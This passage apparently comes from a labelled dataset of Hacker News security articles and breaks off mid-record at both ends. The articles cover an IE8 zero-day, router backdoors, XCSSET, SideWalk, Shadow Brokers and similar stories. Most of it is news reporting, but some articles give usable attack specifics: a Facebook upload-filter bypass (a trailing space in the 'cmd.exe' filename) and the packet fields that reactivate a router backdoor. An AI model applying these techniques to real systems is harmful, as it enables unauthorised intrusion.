The flaw has been used in a series of ""watering hole"" attacks, let's remind that ""Watering Hole"" is a technique of attack realized compromising legitimate websites using a ""drive-by"" exploit. The attackers restrict their audience to a individuals interested to specific content proposed by targeted website, in this way when the victim visits the page a backdoor Trojan is installed on his computer. The website compromised to exploit the IE8 zero-day is the Dept. of Energy's Site Exposure Matrices (SEM) website, the site provides information on ""nuclear-related illnesses"" linked to Dept. of Energy facilities of employees who are experiencing health problems as a result of their professional activities. Security community supposes that behind the exploits of IE8 zero-day flaw there is a group of Chinese hackers known as ""DeepPanda"" that hijacked visitors to a compromised website to deploy Poison Ivy Trojan through the execution of a ""drive-by download exploit"". Security firm FireEye revealed that the new IE8 zero-day exploit is able to work against Internet Explorer 8 for all versions of Windows XP and above, including Windows Server 2003, 2008 and R2. ""This particular exploit checks for OS version, and only runs on Windows XP. We are able to reproduce the code execution and confirm it's a working zero-day exploit against IE8. During our research we also found the exploit constructs a ROP chain on non-ASLRed msvcrt.dll, and we verified it could also work against IE8 on Windows 7. So we believe there should be some other exploits targeting IE8 on Windows 7."" FireEye post states. At the moment there isn't information on the information stolen but it is clear that the campaign discovered is related to a cyber espionage activity due the numerous classified documents managed by targeted departments. Microsoft issued a security advisory on Friday announcing its investigation on the event and confirming it as a ""remote code execution vulnerability."", Microsoft confirmed on Friday that the IE8 zero-day vulnerability exists in Internet Explorer 8 for all versions of Windows XP and above are affected, including Windows Server 2003, 2008 and R2. Microsoft noted that IE6 users on Windows XP, IE7, IE9, and IE10 users on Windows 8 and Surface tablets, are not affected by the security flaw. Other precious suggestions provided by the advisory are: Mitigating Factors: By default, Internet Explorer on Windows Server 2003, Windows Server 2008, and Windows Server 2008 R2 runs in a restricted mode that is known as Enhanced Security Configuration. This mode mitigates this vulnerability. By default, all supported versions of Microsoft Outlook, Microsoft Outlook Express, and Windows Mail open HTML email messages in the Restricted sites zone. The Restricted sites zone, which disables script and ActiveX controls, helps reduce the risk of an attacker being able to use this vulnerability to execute malicious code. If a user clicks a link in an email message, the user could still be vulnerable to exploitation of this vulnerability through the web-based attack scenario. An attacker who successfully exploited this vulnerability could gain the same user rights as the current user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. In a web-based attack scenario, an attacker could host a website that contains a webpage that is used to exploit this vulnerability. In addition, compromised websites and websites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these websites. Instead, an attacker would have to convince users to visit the website, typically by getting them to click a link in an email message or Instant Messenger message that takes users to the attacker's website. ",Vulnerability THN Report : ACER hacked because of their own stupidity !,https://thehackernews.com/2011/06/thn-report-acer-hacked-because-of-their.html,"THN Report : ACER hacked because of their own stupidity ! Yes ! you read right , ACER hacked because of their own stupidity. Yesterday we report that Pakistan Cyber Army hacked Acer Europe Server and 40,000 Users Data, Source Codes & Server Compromised . Today we investigate on this and try to find out that how exactly Pakistan hackers got the FTP access . Here in above image you can see the screenshot taken by us from a ASP forum of Acer-Euro. Acer ASP Support Team posted some Hot Fix Release and give FTP access to other members , so that they can download that Hot Fix. This was posted on January 11, 2008 . Pakistan hackers got this and explore the FTP and In ""PB"" directory they get ""Country Wise Customer Data.zip"" file, which include the 40000 users data managed according to country wise. Now this Data breach is only because of ACER's own Stupidity. The link of Forum post is ""https://asp.acer-euro.com/FORUM/Topic472-8-1.aspx"". ",Vulnerability Malware Encoded Into DNA Hacks the Computer that Reads It,https://thehackernews.com/2017/08/hacking-computer-with-dna.html,"Do you know — 1 Gram of DNA Can Store 1,000,000,000 Terabyte of Data for 1000+ Years? Even in March this year, a team of researchers successfully stored digital data — an entire operating system, a movie, an Amazon gift card, a study and a computer virus — in the strands of DNA. But what if someone stores a malicious program into the DNA, just like an infected USB storage, to hijack the computer that reads it. A team of researchers from the University of Washington in Seattle have demonstrated the first successful DNA-based exploit of a computer system that executes the malicious code written into the synthesised DNA strands while reading it. To carry out the hack, the researchers created biological malware and encoded it in a short stretch of DNA, which allowed them to gain ""full control"" of a computer that tried to process the genetic data when read by a DNA sequencing machine. The DNA-based hack becomes possible due to lack of security in multiple DNA processing software available online, which contains insecure function calls and buffer overflow vulnerabilities. ""We analysed the security of 13 commonly used, open source programs. We selected these programs methodically, choosing ones written in C/C++,"" reads the research paper [PDF], titled ""Computer Security, Privacy, and DNA Sequencing: Compromising Computers with Synthesized DNA, Privacy Leaks, and More."" ""We found that existing biological analysis programs have a much higher frequency of insecure C runtime library function calls (e.g., strcpy). This suggests that DNA processing software has not incorporated modern software security best practices."" To create the biological malware, the researchers translated a simple computer program into a short stretch of 176 DNA letters, denoted as A, G, C, and T, each representing a binary pair (A=00, C=01, G=10, T=11). The exploit took advantage of a basic buffer overflow attack, in which a software program executes the malicious command because it falls outside maximum length. The command then contacted a server controlled by the team, from where the researchers took control of a computer in their laboratory they were using to analyse the DNA file. ""Our exploit did not target a program used by biologists in the field; rather it targeted one that we modified to contain a known vulnerability,"" the researchers said. Although this kind of hack probably doesn't pose any threat anytime soon, the team warned that hackers could in future use fake blood or spit samples to gain access to computers, steal information, or hack medical equipments installed at forensic labs, hospitals and the DNA-based data storage centers. The researchers will be presenting this first ""DNA-based exploit of a computer system"" at the next week's Usenix Security Symposium in Vancouver. For the more in-depth explanation on the DNA-based hack, you can head on to the research paper. ",Malware "Hackers Can Steal $999,999.99 from Visa Contactless Payment Cards",https://thehackernews.com/2014/11/hackers-can-steal-99999999-from-visa.html,"Security researchers from Newcastle University in the UK have found a way to steal larger amounts of money from people's pockets using just a mobile phone, due to a security glitch Visa's contactless payment cards. Contactless payment cards use a cryptoprocessor and RFID technology to perform secure transactions without a need to insert the card in a reader, even an NFC-equipped mobile device may also be used as a payment card. But there is a specified limits country-wise. Contactless payment cards are meant to have a limit of £20 per purchase in UK, using which shoppers can buy things by simply tapping their card on a scanner, without having to type in a PIN. But exploiting a flaw in its protocol could allow cyber criminals to manipulate the cards to transfer up to $999,999.99 in foreign currency into a scammer's account. Researchers on Wednesday at the 21st ACM Conference on Computer and Communications Security, detailed the attack which rely on a ""rogue POS terminal"" running on a mobile device that could be pre-set to a large amount of money, a wireless transfer of up to 999,999.99 units in any currency. ""With just a mobile phone we created a POS terminal that could read a card through a wallet,"" Martin Emms, lead researcher of the project noted in a statement about the findings. ""All the checks are carried out on the card rather than the terminal so at the point of transaction, there is nothing to raise suspicions."" ""By pre-setting the amount you want to transfer, you can bump your mobile against someone's pocket or swipe your phone over a wallet left on a table and approve a transaction. In our tests, it took less than a second for the transaction to be approved."" The good news is that the research team haven't tested how Visa's system reacted to a rush of foreign currency transfers, and whether it would flag them up as a possible fraud or not. But the experts are worried that the contactless payment cards system is insecure, and that cybercriminals would likely use the flaw to set up hundreds or thousands of fraudulent transactions in smaller amounts to evade detection. ""Our research has identified a real vulnerability in the payment protocol, which could open the door to potential fraud by criminals who are constantly looking for ways to breach the system,"" Emms said. In a report on the BBC, Visa Europe said that ""we have reviewed Newcastle's findings as part of our continued focus on security and beating payments fraud"" and that their research ""does not take into account the multiple safeguards put into place throughout the Visa system"", adding that it would be ""very difficult to complete this type of transaction outside of a laboratory environment."" Visa Europe also said that the company is updating its protection to require more payment card transactions to be authenticated online, making this kind of attack more difficult to carry out. ",Vulnerability Hacker Who Leaked Celebrities' Personal Photos Gets 8 Months in Prison,https://thehackernews.com/2018/08/photos-celebrity-hacker.html,"George Garofano (left) The fourth celebrity hacker—who was charged earlier this year with hacking into over 250 Apple iCloud accounts belonged to Jennifer Lawrence and other Hollywood celebrities—has been sentenced to eight months in prison. Earlier this year, George Garofano, 26, of North Branford, admitted to illegally obtaining credentials of his victims' iCloud accounts using a phishing scheme, carried out from April 2013 to October 2014, in which he posed as a member of Apple's security team and tricked victims into revealing their iCloud credentials. Using stolen credentials, Garofano then managed to steal victims' personal information, including their sensitive and intimate photographs and videos, from their iCloud accounts, and then leaked them on online forums, like 4Chan. Among the victims were Jennifer Lawrence, Kim Kardashian, Kirsten Dunst, Kate Upton, American Olympic gold medallist Misty May Treanor and actors Alexandra Chando, Kelli Garner and Lauren O'Neil. While prosecutors asked for a sentence of at least 10 to 16 months in prison, Garofano's lawyer requested the judge to give his client a lighter sentence of five months in prison and another five months of home confinement. However, a federal judge at the US district court in Bridgeport on Wednesday sentenced Garofano to 8 months in prison and 3 years of supervised release after his prison term is over. Garofano is one of the four hackers who stole and leaked celebrities' photographs in the 2014 event, which is well known as ""The Fappening"" or ""Celebgate"" scandal. The other three Celebgate hackers had already been sentenced for their roles in the celebrity photo hack: Edward Majerczyk, 28, was sentenced to nine months in prison after pleading guilty to felony hacking and violating Computer Fraud and Abuse Act. Ryan Collins, 36, was sentenced to 18 months in prison after pleading guilty to the same. Emilio Herrera, 32, pled guilty to the same but is still awaiting his sentencing. While the US Attorney says there's no evidence that Majerczyk, Collins, or Herrera shared or posted the stolen photos online, prosecutors allege that Garofano, in some instances, also traded the stolen iCloud credentials and the victims' intimate images with other people. Garofano, who is released on a $50,000 bond, will surrender on October 10, 2018, to serve his prison sentence. The judge has also ordered Garofano to perform 60 hours of community service while he is on supervised release. ",Cyber_Attack Facebook EXE attachment Vulnerability can Compromise with Users Security,https://thehackernews.com/2011/10/facebook-exe-attachment-vulnerability.html,"Facebook EXE attachment Vulnerability can Compromise with Users Security Nathan Power from SecurityPentest has discovered new Facebook Vulnerability, that can easily attach EXE files in messages,cause possible User Credentials to be Compromised . When using the Facebook 'Messages' tab, there is a feature to attach a file. Using this feature normally, the site won't allow a user to attach an executable file. A bug was discovered to subvert this security mechanisms. Note, you do NOT have to be friends with the user to send them a message with an attachment. But Nathan Power Find the way to upload EXE . When uploading a file attachment to Facebook we captured the web browsers POST request being sent to the web server. Inside this POST request reads the line: Content-Disposition: form-data; name=""attachment""; filename=""cmd.exe"" It was discovered the variable 'filename' was being parsed to determine if the file type is allowed or not. To subvert the security mechanisms to allow an .exe file type, we modified the POST request by appending a space to our filename variable like so: filename=""cmd.exe "" ",Vulnerability Malware That Spreads Via Xcode Projects Now Targeting Apple's M1-based Macs,https://thehackernews.com/2021/04/malware-spreads-via-xcode-projects-now.html,"A Mac malware campaign targeting Xcode developers has been retooled to add support for Apple's new M1 chips and expand its features to steal confidential information from cryptocurrency apps. XCSSET came into the spotlight in August 2020 after it was found to spread via modified Xcode IDE projects, which, upon the building, were configured to execute the payload. The malware repackages payload modules to imitate legitimate Mac apps, which are ultimately responsible for infecting local Xcode projects and injecting the main payload to execute when the compromised project builds. XCSSET modules come with the capabilities to steal credentials, capture screenshots, inject malicious JavaScript into websites, plunder user data from different apps, and even encrypt files for a ransom. Then in March 2021, Kaspersky researchers uncovered XCSSET samples compiled for the new Apple M1 chips, suggesting that the malware campaign was not only ongoing but also that adversaries are actively adapting their executables and porting them to run on new Apple Silicon Macs natively. The latest research by Trend Micro shows that XCSSET continues to abuse the development version of the Safari browser to plant JavaScript backdoors onto websites via Universal Cross-site Scripting (UXSS) attacks. ""It hosts Safari update packages in the [command-and-control] server, then downloads and installs packages for the user's OS version,"" Trend Micro researchers said in an analysis published on Friday. ""To adapt to the newly-released Big Sur, new packages for 'Safari 14' were added."" In addition to trojanizing Safari to exfiltrate data, the malware is also known for exploiting the remote debugging mode in other browsers such as Google Chrome, Brave, Microsoft Edge, Mozilla Firefox, Opera, Qihoo 360 Browser, and Yandex Browser to carry out UXSS attacks. What's more, the malware now even attempts to steal account information from multiple websites, including NNCall.net, Envato, and 163.com, and cryptocurrency trading platforms like Huobi and Binance, with abilities to replace the address in a user's cryptocurrency wallet with those under the attacker's control. XCSSET's mode of distribution via doctored Xcode projects poses a serious threat, as affected developers who unwittingly share their work on GitHub could pass on the malware to their users in the form of the compromised Xcode projects, leading to ""a supply-chain-like attack for users who rely on these repositories as dependencies in their own projects."" ",Malware New Systemd Privilege Escalation Flaws Affect Most Linux Distributions,https://thehackernews.com/2019/01/linux-systemd-exploit.html,"Security researchers have discovered three vulnerabilities in Systemd, a popular init system and service manager for most Linux operating systems, that could allow unprivileged local attackers or malicious programs to gain root access on the targeted systems. The vulnerabilities, assigned as CVE-2018-16864, CVE-2018-16865, and CVE-2018-16866, actually resides in the ""systemd-journald"" service that collects information from different sources and creates event logs by logging information in the journal. The vulnerabilities, which were discovered and reported by security researchers at Qualys, affect all systemd-based Linux distributions, including Redhat and Debian, according to the researchers. However, some Linux distros such as SUSE Linux Enterprise 15, openSUSE Leap 15.0, and Fedora 28 and 29 are not affected, as ""their userspace [code] is compiled with GCC's -fstack-clash-protection."" The first two flaws are memory corruptions issues, while the third one is an out-of-bounds read issue in systemd-journald that can leak sensitive process memory data. Researchers have successfully created proof-of-concept exploits, which they are planning to release in the near future. ""We developed an exploit for CVE-2018-16865 and CVE-2018-16866 that obtains a local root shell in 10 minutes on i386 and 70 minutes on amd64, on average,"" the researchers write in an advisory published Wednesday. CVE-2018-16864 is similar to a Stack Clash vulnerability Qualys researchers discovered in 2017 that can be exploited by malware or low privileged users to escalate their permission to root. According to the researchers, CVE-2018-16864 existed in systemd's codebase since April 2013 (systemd v203) and became exploitable in February 2016 (systemd v230), while CVE-2018-16865 was introduced in December 2011 (systemd v38) and became exploitable in April 2013 (systemd v201), Qualys says. However, the third vulnerability (CVE-2018-16866) was introduced in systemd's codebase in June 2015 (systemd v221), but according to the researchers, it was ""inadvertently fixed in August 2018."" If you are using a vulnerable Linux system, keep tabs on the latest updates by your respective Linux distribution and install the patches as soon as they are released. ",Vulnerability Feds Secretly Ran a Fake Encrypted Chat App and Busted Over 800 Criminals,https://thehackernews.com/2021/06/feds-secretly-ran-fake-encrypted-chat.html,"In an unprecedented sting operation, the U.S. Federal Bureau of Investigation (FBI) and Australian Federal Police (AFP) ran an encrypted chat service called ANoM for nearly three years to intercept 27 million messages exchanged between criminal gang members globally. Dubbed Operation Ironside (AFP), Operation Greenlight (Europol), and Operation Trojan Shield (FBI), the long-term covert probe into transnational and serious organized crime culminated in the arrests of 224 offenders on 526 charges in Australia, with 55 luxury vehicles, eight tons of cocaine, 22 tons of cannabis and cannabis resin, 250 firearms, and more than $48 million in various currencies and cryptocurrencies seized in raids around the world. A total of more than 800 arrests have been reported across 18 countries, including New Zealand, Germany, and Sweden. Europol called it the ""biggest ever law enforcement operation against encrypted communication."" The communications allegedly involved plots to kill, orchestrate mass drug trafficking, and gun distribution, according to the AFP, which gained lawful access to these encrypted messages through using the Telecommunications and Other Legislation Amendment (Assistance and Access) Act 2018. ""For almost three years, the AFP and the FBI have monitored criminals' encrypted communications over a Dedicated Encrypted Communications Platform,"" AFP said. ""The AFP built a capability that allowed law enforcement to access, decrypt and read communications on the platform. The AFP and FBI were able to capture all the data sent between devices using the platform."" The cryptographic barriers were surmounted by inserting a master key into ANoM's encryption system that was stealthily attached to every message, thus enabling the law enforcement to execute a man-in-the-middle (MitM) scheme to decrypt and retrieve the messages as they were transmitted. For devices located outside of the U.S., an encrypted ""BCC"" copy of the messages was forwarded to a server located in an unnamed third country, from where it was forwarded to a second FBI-owned server for subsequent decryption. ANoM (aka Anøm) is said to have been intentionally created to fill the vacuum left by Phantom Secure, another encrypted phone service dismantled by the FBI in 2018, thereby allowing the agencies to eavesdrop on the conversations unbeknownst to the criminals. In a move echoing that of Phantom Secure, criminals needed to be part of a closed network to get hold of a phone on which ANoM came preinstalled, while the devices themselves were stripped of all other functionality. Among some of the features of the app included the ability to — Send encrypted text and voice messages Make secure voice calls Share photos, videos, animated GIFs, locations, drawings, and Send files of any type In addition, phone owners also had the option to verify their contacts via a QR code, create distribution lists, and chat completely anonymously without even requiring a phone number, according to a listing from the now taken down anom.io website. Operation Ironside follows similar law enforcement actions that involved infiltrating encrypted chat platform EncroChat to tap millions of encrypted messages sent by organized crime networks through the platform. Earlier this year, a coordinated exercise under the name ""Operation Argus"" staged major interventions against Sky ECC, leading to nearly 275 raids and the arrest of 91 suspects, besides seizing 17 tonnes of cocaine and €1.2 million. A Trojan Horse to Trap Crime Syndicates In controlling the encrypted chat network right from its inception in 2018, ANoM was a cleverly designed trap meant to ensnare domestic and international organized crime syndicates who had previously relied on other platforms to facilitate murders and drug smuggling. To that end, the FBI recruited a confidential human source, who had previously sold phones from both Phantom Secure and Sky Global to criminal organizations and had ""invested a substantial amount of money into the development of a new hardened encrypted device"" (i.e., ANoM), to penetrate the crime networks and distribute the devices. Besides agreeing to cooperate with law enforcement authorities for the possibility of a reduced prison sentence, the FBI paid the informant $179,508 for the services rendered as well as for living and travel expenses. ""The devices organically circulated and grew in popularity among criminals, who were confident of the legitimacy of the app because high-profile organised crime figures vouched for its integrity,"" the AFP said. By May 2021, the phones, which were procured from the black market, had increased to 11,800 in number, of which about 9,000 are in active use, spanning over 300 criminal syndicates operating in more than 100 countries. The top five countries where ANoM devices are currently used are Germany, the Netherlands, Spain, Australia, and Serbia, unsealed court documents show, with its user base having grown significantly in the aftermath of Sky ECC's disruption. ""After the takedown of Sky ECC in March 2021, many organised crime networks sought a quick encrypted replacement for a communication platform that would allow them to evade law enforcement detection,"" Europol said. ""This was a deliberate and strategic aspect of OTF Greenlight / Operation Trojan Shield resulting in the migration of some of the criminal Sky ECC customer base to the FBI-managed platform ANoM."" The international coalition that participated in the joint operation consisted of Australia, Austria, Canada, Denmark, Estonia, Finland, Germany, Hungary, Lithuania, New Zealand, the Netherlands, Norway, Sweden, the U.K. (including Scotland), and the U.S. ""A goal of the Trojan Shield investigation is to shake the confidence in this [hardened encrypted device] industry because the FBI is willing and able to enter this space and monitor messages,"" the court documents stated. ",Malware New SideWalk Backdoor Targets U.S.-based Computer Retail Business,https://thehackernews.com/2021/08/new-sidewalk-backdoor-targets-us-based.html,"A computer retail company based in the U.S. was the target of a previously undiscovered implant called SideWalk as part of a recent campaign undertaken by a Chinese advanced persistent threat group primarily known for singling out entities in East and Southeast Asia. Slovak cybersecurity firm ESET attributed the malware to an advanced persistent threat it tracks under the moniker SparklingGoblin, an adversary believed to be connected to the Winnti umbrella group, noting its similarities to another backdoor dubbed Crosswalk that was put to use by the same threat actor in 2019. ""SideWalk is a modular backdoor that can dynamically load additional modules sent from its C&C [command-and-control] server, makes use of Google Docs as a dead drop resolver, and Cloudflare workers as a C&C server,"" ESET researchers Thibaut Passilly and Mathieu Tartare said in a report published Tuesday. ""It can also properly handle communication behind a proxy."" Since first emerging on the threat landscape in 2019, SparklingGoblin has been linked to several attacks aimed at Hong Kong universities using backdoors such as Spyder and ShadowPad, the latter of which has become a preferred malware of choice among multiple Chinese threat clusters in recent years. Over the past year, the collective has hit a broad range of organizations and verticals around the world, with a particular focus on the academic institutions located in Bahrain, Canada, Georgia, India, Macao, Singapore, South Korea, Taiwan, and the U.S. Other targeted entities include media companies, religious organizations, e-commerce platforms, computer and electronics manufacturers, and local governments. SideWalk is characterized as an encrypted shellcode, which is deployed via a .NET loader that takes care of ""reading the encrypted shellcode from disk, decrypting it and injecting it into a legitimate process using the process hollowing technique."" The next phase of the infection commences with SideWalk establishing communications with the C&C server, with the malware retrieving the encrypted IP address from a Google Docs document. ""The decrypted IP address is 80.85.155[.]80. That C&C server uses a self-signed certificate for the facebookint[.]com domain. This domain has been attributed to BARIUM by Microsoft, which partially overlaps with what we define as Winnti Group. As this IP address is not the first one to be used by the malware, it is considered to be the fallback one,"" the researchers said. Besides using HTTPS protocol for C&C communications, SideWalk is designed to load arbitrary plugins sent from the server, amass information about running processes, and exfiltrate the results back to the remote server. ""SideWalk is a previously undocumented backdoor used by the SparklingGoblin APT group. It was most likely produced by the same developers as those behind CROSSWALK, with which it shares many design structures and implementation details,"" the researchers concluded. ",Malware "NSA will not stop spying on us, next move Quantum computer to break strongest Encryption",https://thehackernews.com/2014/01/nsa-will-not-stop-spying-on-us-next.html,"Image Credit: The guardian If I say that NSA (National Security Agency) will never stop spying on us then it won't be wrong. After the exposure of the large number of surveillance scandals including PRISM, DROPOUTJEEP, XKeyscore and many many more which are now publicly known as well as unknown, Will NSA ever stop Privacy breach? Obviously 'NO'. That I can predict from another Snowden leak published by the Washington Post news website recently i.e. US National Security Agency (NSA) is trying to develop a futuristic super computer called 'Quantum computer' that could be capable of breaking almost every kind of encryption on the computer used to protect banks, medical, business including top-secret information held by government around the world. The Project is specified as ""Penetrating Hard Targets"" in the document and is a part of $79.7 million research program. The Washington Post says that the research is being done at the University of Maryland's Laboratory for Physical Sciences. The goal of creating a working quantum computer is to boost encryption cracking capabilities against world's strongest encryption i.e. RSA - commonly used in Web browsers for encrypted emails and secure financial transactions. RT News reports: The basic principle in quantum computing is ""quantum superposition,"" or the idea that an object simultaneously exists in all states. A classic computer uses binary bits, or zeroes and ones. A quantum computer uses quantum bits, or qubits, that are simultaneously zero and one. While a classic computer must do one calculation at a time, a quantum computer can achieve a correct answer much faster and efficiently through parallel processing, with no need to run those calculations. The progress of the NSA's Project on such computer is not known, but Snowden's documents suggested that the agency is no closer to building a quantum computer and it is difficult to attain because of the fragile nature of such computers. His disclosures not only threatened the whole world but also surprised his own citizens who have the thing called the Constitution and in that constitution has a 'Bill of rights', one of which is the 4th amendment says: The right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated, and no Warrants shall issue, but upon probable cause, supported by Oath or affirmation, and particularly describing the place to be searched, and the persons or things to be seized. Now when the IT World is facing massive security breaches like Target, Adobe, Linkedin, Snapchat due to the lack of good encryption practices and Malware threats like Cryptolocker - due to the strongest encryption, but the NSA is doing NOTHING to defend people against such threats. I suppose the dedication of NSA to save the world and to developing the strongest encryptions, rather they are ruining the user' privacy and security community by targeting encryption, tapping telephones, accessing email, hacking iPhone etc. At the same time such activities by National Security Agencies are also motivating the cyber criminals to do the same. Here you can read all NSA Stories published on 'The Hacker News' - Click Here. ",Malware Disgusting! Ashley Madison was Building an App – 'What's your Wife Worth?',https://thehackernews.com/2015/08/ashley-madison-whats-your-wife-worth-app.html,"We could expect Ashley Madison to cross any limits when it comes to cheating, but this is WORSE. After all the revelations made by the Impact Team past week, this was something different from the leaked data that had names, password and other details of Ashley Madison clients. A dump from the leaked files unfold awful strategy of Avid Life Media (ALM), Ashley Madison's parent company, to launch an app called ""What's your wife worth."" As the name says it all, the app allows men to Rate each others Wives. Know Your Wife Worth 'What's your wife worth' was discovered in a June 2013 email exchanged between Noel Biderman, ALM's chief executive and Brian Offenheim, ALM's vice president of creative and design, which said that Biderman suggested Offenheim about the probable outlook of the app. He suggested options like ""Choice should be 'post your wife' and 'bid on someone's wife',"" also mentioning: ""I am not sure we should be asking for real names—rather usernames."" To which Offenheim gave some feedback, by attaching a dummy of the app's sign up design, which appeared something like this: Though Biderman liked it, somehow the app's development was not completed and the idea was dumped, as one of Biderman's colleagues referred the concept as horrible in the emails. We are in a dilemma - whether the person referred to app's development as horrible or the idea behind the thought of developing such an app! There were more than 197,000 emails that were leaked from Biderman's inbox by the hackers calling themselves as the Impact Team last Friday. Besides this the hackers released personal information of more than 33 Million Ashley Madison accounts. Which led to suicides as well. ",Data_Breaches Routers TCP 32764 Backdoor Vulnerability Secretly Re-Activated Again,https://thehackernews.com/2014/04/router-manufacturers-secretly-added-tcp.html,"At the beginning of this year, we reported about the secret backdoor 'TCP 32764' discovered in several routers including, Linksys, Netgear, Cisco and Diamond that allowed an attacker to send commands to the vulnerable routers at TCP port 32764 from a command-line shell without being authenticated as the administrator. The Reverse-engineer from France Eloi Vanderbeken, who discovered this backdoor has found that although the flaw has been patched in the latest firmware release, but SerComm has added the same backdoor again in another way. To verify the released patch, recently he downloaded the patched firmware version 1.1.0.55 of Netgear DGN1000 and unpacked it using binwalk tool. He found that the file 'scfgmgr' which contains the backdoor is still present there with a new option ""-l"", that limits it only for a local socket interprocess communication (Unix domain socket), or only for the processes running on the same device. On further investigation via reverse engineering the binaries, he found another mysterious tool called 'ft_tool' with ""-f""option that could re-activates the TCP backdoor. In his illustrated report (shown below), he explained that 'ft_tool' actually open a raw socket, that listens incoming packages and attackers on the local network can reactivate the backdoor at TCP port 32764 by sending the following specific packets: EtherType parameter should be equal to '0x8888'. Payload should contains MD5 hash of the value DGN1000 (45d1bb339b07a6618b2114dbc0d7783e). The package type should be 0x201. So, an attacker can reactivate the TCP 32764 backdoor in order to execute the shell commands on the vulnerable SerComm routers even after installing the patched version. Now question rises, why the routers manufacturers are adding intentional backdoors again and again?? May be the reason behind to be a helping hand for the U.S. intelligence agency NSA. Currently there is no patch available for newly discovered backdoor. If you want to check your wireless router for this backdoor, you can download Proof-of-Concept (PoC) exploit released by the researcher from here or follow the below given steps manually: Use 'binwalk -e' to extract the file system Search for 'ft_tool' or grep -r 'scfgmgr -f Use IDA to confirm. ",Vulnerability "Shadow Brokers, Who Leaked WannaCry SMB Exploit, Are Back With More 0-Days",https://thehackernews.com/2017/05/shodow-brokers-wannacry-hacking.html,"The infamous hacking collective Shadow Brokers – the one who leaked the Windows SMB exploit in public that led to last weekend's WannaCrypt menace – are back, this time, to cause more damage. In typically broken English, the Shadow Brokers published a fresh statement (with full of frustration) a few hours ago, promising to release more zero-day bugs and exploits for various desktop and mobile platforms starting from June 2017. However, this time the Shadow Brokers leaks will not be available for everybody, as the hacking collective said: ""TheShadowBrokers is launching new monthly subscription model. Is being like [the] wine of month club. Each month peoples can be paying membership fee, then getting members only data dump each month."" To some extent, this is good news, but it is terrible news too. Good because now all these upcoming alleged unpatched vulnerabilities will be patched after being disclosed and terrible because the group will sell new zero-day exploits and hacking tools to private members with paid monthly subscription, instead of telling them to Microsoft. Apparently, other hackers, criminal gangs, state-sponsored hackers, maybe some journalists and people from tech companies, would naturally join Shadow Brokers' membership. Get Ready for the 'Wine of Month Club' So, anyone buying the membership of the ""wine of month club"" would be able to get exclusive access to the upcoming leaks, which the Shadow Brokers claims would include: Exploits for web browsers, routers, and smartphones. Exploits for operating systems, including Windows 10. Compromised data from banks and Swift providers. Stolen network information from Russian, Chinese, Iranian, and North Korean nuclear missile programs. The claims made by the group remain unverified at the time of writing, but since the Shadow Brokers' previously released data dump turned out to be legitimate, the group's statement should be taken seriously, at least now, when we know the EternalBlue exploit and DoublePulsar backdoor developed by the NSA and released by the Shadow Brokers last month was used by WannaCry to cause chaos worldwide. Before publicly dumping these exploits in April, the Shadow Brokers put an auction of cyber weapons stolen from NSA's elite hacking team called Equation Group for 1 Million Bitcoin. After failed auction, the hacking group even put up those hacking tools and exploits for direct sale on an underground site, categorizing them into a type — like ""exploits,"" ""Trojans,"" and ""implant"" — each of which ranged from 1 to 100 Bitcoins (from $780 to $78,000). After failure from all sides, the group started leaking those hacking exploits. Last month, the Shadow Brokers released a Microsoft Windows SMB exploit that was used by the WannaCry ransomware, which infected 200,000 machines in 150 countries within just 48 hours. While talking about the WannaCry ties with North Korean state-sponsored hacking group Lazarus Group, the group said: ""The Oracle is telling theshadowbrokers North Korea is being responsible for the global cyber attack Wanna Cry. Nukes and cyber attacks, America has to go to war, no other choices!"" Shadow Brokers Lashed out on US Government and Tech Companies In its recent post, the Shadow Brokers criticized both the US government and tech companies, such as Microsoft, for not cracking down on the exploits when they had the chance, months before their release. The hacking group said the US government is paying tech companies not to patch zero-days in their products, claiming that it has spies inside Microsoft among other US tech firms. The Shadow Brokers even accused Google Project Zero team, saying: ""TheShadowBrokers is thinking Google Project Zero is having some former TheEquationGroup member. Project Zero recently releasing ""Wormable Zero-Day"" Microsoft patching in record time, knowing it was coming? Coincidence?"" Who knows if these accusation made by the Shadow Brokers group are true or not, but the world should be well prepared for another WannaCry-like massive destroyer. ",Vulnerability Pro-Tibetan activists become victim of Spear Phishing,https://thehackernews.com/2012/04/pro-tibetan-activists-become-victim-of.html,"Pro-Tibetan activists become victim of Spear Phishing Hackers are ramping up their attacks against Tibetan activists and are using increasingly sophisticated techniques to deliver malware An interesting example of such a malicious email has recently been spotted by FireEye researcher Alex Lanstein, who is currently monitoring these spam campaigns. In the last few of months, several security vendors have reported targeted attacks that distributed malware designed to steal confidential information from people or organizations supporting the Tibetan cause. This tactic recently re-surfaced during our monitoring of Tibetan-leveraging malware campaigns. It came in the form of BKDR_RILER.SVR, a backdoor that arrives infected by PE_SALITY.AC. A simple Spear Phishing technique was used recently to trick Tibetan activists into opening malicious PDF email attachments, by quoting a legitimate email message sent by FireEye's Lanstein to people who submitted Tibet-related malware samples to the VirusTotal online antivirus scanning service. According to Trend Micro researcher Ivan Macalintal, by exploiting a vulnerability, the attachment - Next Generation Threats.pdf - drops a malicious JavaScript that in its turn drops a RAT that connects to a IP address located in China. There are a few hints that the people behind the attack are Chinese. The email text was recreated under a key official character set of the People's Republic of China, and in the footer of the decoy PDF file a few Chinese characters can be found. The said backdoor communicates the following information to the IP address about IM IDs and password, List of drives and files, User account names and passwords. The social engineering techniques used in these attacks are increasingly sophisticated and the distributed malware is capable of infecting both Windows and Mac OS X computers. On Friday, researchers from antivirus firm Kaspersky Lab reported the discovery of a new Mac OS X backdoor which they named SabPub. Tibetan activists are on a long hit list uncovered by Trend Micro and dubbed the Luckycat campaign it uses spear-phishing to inject Windows malware, and targets military and other sensitive entities in India and Japan as well as Tibetan activists. ",Malware Hackers Trick Microsoft Into Signing Netfilter Driver Loaded With Rootkit Malware,https://thehackernews.com/2021/06/hackers-trick-microsoft-into-signing.html,"Microsoft on Friday said it's investigating an incident wherein a driver signed by the company turned out to be a malicious Windows rootkit that was observed communicating with command-and-control (C2) servers located in China. The driver, called ""Netfilter,"" is said to target gaming environments, specifically in the East Asian country, with the Redmond-based firm noting that ""the actor's goal is to use the driver to spoof their geo-location to cheat the system and play from anywhere."" ""The malware enables them to gain an advantage in games and possibly exploit other players by compromising their accounts through common tools like keyloggers,"" Microsoft Security Response Center (MSRC) said. It's worth pointing out that Netfilter also refers to a legitimate software package, which enables packet filtering and network address translation for Linux based systems. Microsoft dubbed the malware 